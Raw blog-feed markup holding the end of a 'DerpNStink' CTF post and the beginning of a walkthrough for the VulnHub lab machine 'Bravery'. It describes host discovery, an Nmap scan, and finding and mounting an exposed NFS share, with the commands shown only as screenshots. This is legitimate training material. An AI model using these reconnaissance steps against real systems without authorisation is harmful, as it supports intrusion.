src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiC8C6xkQy69oy_f9mF-8j4qly_-BQRaNmLiQlVGklXq1WzRUfN5j_65ndJL9FJ447H2ZuORnuSqcpJ1LTeD3Rewxf9vuLaL00NIINRZNk1pYMwoM_Sa_9ZP7O8SSgk4RfA0xiCtTof-NCv8tO7U0pSD_vjbZlUhvnYw-h9T9h1iGSFBXGDdM3aZiP2_A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;FLAG_4&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKx_ymO9D3sh_CvoeleyWZfFU5viNBT14ybe432NGnk-omFcttFiNPmwoWEFLPmM-XCqPO5lS5msnji0ADdH5o3n76dw9q5umNuJUsk-mRtjnJE9s8wbbC4Sb9MX7bko6GDfooDLa7S1D-77gWXfIqeQtghC1S8hDFgArzh5RThnJx8pjfxcm2DfyHOg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;348&quot; data-original-width=&quot;809&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKx_ymO9D3sh_CvoeleyWZfFU5viNBT14ybe432NGnk-omFcttFiNPmwoWEFLPmM-XCqPO5lS5msnji0ADdH5o3n76dw9q5umNuJUsk-mRtjnJE9s8wbbC4Sb9MX7bko6GDfooDLa7S1D-77gWXfIqeQtghC1S8hDFgArzh5RThnJx8pjfxcm2DfyHOg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3612734954467894871'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3612734954467894871'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/derpnstink.html' title='DerpNStink'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEisJCj2aqYXVcqpG_Ng11CJsiuPPkaAoPNRTPqaw9JqhHiMnns5ZKYDF1fGR7l3hehdPVTAxtFnKCqydedvekhMteyiERSk4vOMHHgwUl0hAomnJD1NgowK8lG7_-sDB7JXs7t1hdf7I43DJIvAA0hmuHc3j4ez6XvR9ZGV44AMEPqT-5KRR3jgou62VQ=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-3163363275319018771</id><published>2022-02-02T12:34:00.001-06:00</published><updated>2022-02-02T12:34:40.505-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Bravery</title><content type='html'>&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;BRAVERY&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjggG9BoGv6-CPyUnSi0rNrLdVMYQu4i1j69rGTmkrYO5v4OCKnnM0nz6pH3CIq86OPcuNYic-th1rjDivukC9gsVTbONHdJgB6tLVtaJOvLzs9YW2bqKQUKhrM-H4AjfVVnQ8pwDVi6lUw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;255&quot; data-original-width=&quot;670&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjggG9BoGv6-CPyUnSi0rNrLdVMYQu4i1j69rGTmkrYO5v4OCKnnM0nz6pH3CIq86OPcuNYic-th1rjDivukC9gsVTbONHdJgB6tLVtaJOvLzs9YW2bqKQUKhrM-H4AjfVVnQ8pwDVi6lUw/s16000/screenshot.63.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Bravery&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;- &lt;b&gt;Bravery&lt;/b&gt; can be downloaded from here:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/&quot;&gt;https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;- Once downloaded &lt;b&gt;Bravery&lt;/b&gt; and extracted with VirtualBox:&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY98KcDHghXfh4xFrV35aqyabvWHDpixnK3-IX9LZFGG052Kzbj3p5GkuSznBx8t3PXV7IAW6KO8y1s5Dd_wcZQcNN_71wo3JgSwEr_vUinNiUGKmdw9ZI6_0Hb-hcqkJxBG03pZQCqIbD/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;530&quot; data-original-width=&quot;553&quot; height=&quot;383&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY98KcDHghXfh4xFrV35aqyabvWHDpixnK3-IX9LZFGG052Kzbj3p5GkuSznBx8t3PXV7IAW6KO8y1s5Dd_wcZQcNN_71wo3JgSwEr_vUinNiUGKmdw9ZI6_0Hb-hcqkJxBG03pZQCqIbD/w400-h383/screenshot.2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- netdiscover helps to learn about Bravery&#39;s IP 192.168.1.26:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuP_9RUoX-rPr5FL2Ecr5YPD-DBzpwf6kzzCWgRFh3hUi-oztYRiNCcdEqxlxYsbrwWdckMqwtYkuEhSK3293gZYOyVvT3dmzs7WAjBe1g-D6l0jEaRRhybEiJ48JZzug0SXHZ7CvvM80n/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;27&quot; data-original-width=&quot;565&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuP_9RUoX-rPr5FL2Ecr5YPD-DBzpwf6kzzCWgRFh3hUi-oztYRiNCcdEqxlxYsbrwWdckMqwtYkuEhSK3293gZYOyVvT3dmzs7WAjBe1g-D6l0jEaRRhybEiJ48JZzug0SXHZ7CvvM80n/s16000/screenshot.1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQ2W-e9tI6Ku5g0Y_M8iSr6khRf5fesllTGuWKhvEM8FEvdp6274T-QqC1vqOtfnBg0CqkH7Kzlw7WC-IzZ62Erxp8rXPwAVolUdrIb5MieLFh1jg3H8TLtfGKk1GKGmFrysO86wfyimZ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;235&quot; data-original-width=&quot;383&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQ2W-e9tI6Ku5g0Y_M8iSr6khRf5fesllTGuWKhvEM8FEvdp6274T-QqC1vqOtfnBg0CqkH7Kzlw7WC-IzZ62Erxp8rXPwAVolUdrIb5MieLFh1jg3H8TLtfGKk1GKGmFrysO86wfyimZ/s16000/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBtX9LcUV1U4whdyOu-DQvZI-P2sqvu81TSUyosYPM6AsQR3nqJPh-2Qnmku3cELNh3FkjpRy8hkZMbr_zl06XEFhwWc4s_i9cLdbZfkNl4s3lMQ6Hig88Bt2Jsvj0ZhPfK0HoPz8Iq7Hp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;369&quot; data-original-width=&quot;432&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBtX9LcUV1U4whdyOu-DQvZI-P2sqvu81TSUyosYPM6AsQR3nqJPh-2Qnmku3cELNh3FkjpRy8hkZMbr_zl06XEFhwWc4s_i9cLdbZfkNl4s3lMQ6Hig88Bt2Jsvj0ZhPfK0HoPz8Iq7Hp/s16000/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is a NFS (Network File System) server at port 2049, so command &lt;b&gt;showmount&lt;/b&gt;&amp;nbsp;shows information about it:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRptLPDTY8gAw-JvdJEKXUqOJSVnwCu3B2ETHkgF0NHoBjIWSOmsRWBOSsDr8DKVUh31WJXIzH9WXwOOQ7H_oMDQ5yAyfe3wo1hkWz8ypbHQEXdz4kKktW3dH8ZDXEGaCoWxuLQYHR3_hryEONmQ3LfefjoKtDRo_qU3qDzayIKUMMdvsRHCdahF-mmQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;525&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRptLPDTY8gAw-JvdJEKXUqOJSVnwCu3B2ETHkgF0NHoBjIWSOmsRWBOSsDr8DKVUh31WJXIzH9WXwOOQ7H_oMDQ5yAyfe3wo1hkWz8ypbHQEXdz4kKktW3dH8ZDXEGaCoWxuLQYHR3_hryEONmQ3LfefjoKtDRo_qU3qDzayIKUMMdvsRHCdahF-mmQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Directory &lt;b&gt;/var/nfsshare&lt;/b&gt; is shared and we can mount it at Kali:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUSD6GCpgDgveOVQlHNZuONkGSn_35pXQE2W3Vos3-PCufYWn65H0m8QbcjUBtg7cIBVKB0QbQmP0l5tjYc_P_6__pSyQLMCp5NBl_JZaJ4s9qoRoQ-zGb4J8lFn5RKIRJRcOcFG0ShUTp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;344&quot; data-original-width=&quot;847&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUSD6GCpgDgveOVQlHNZuONkGSn_35pXQE2W3Vos3-PCufYWn65H0m8QbcjUBtg7cIBVKB0QbQmP0l5tjYc_P_6__pSyQLMCp5NBl_JZaJ4s9qoRoQ-zGb4J8lFn5RKIRJRcOcFG0ShUTp/s16000/screenshot.6.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 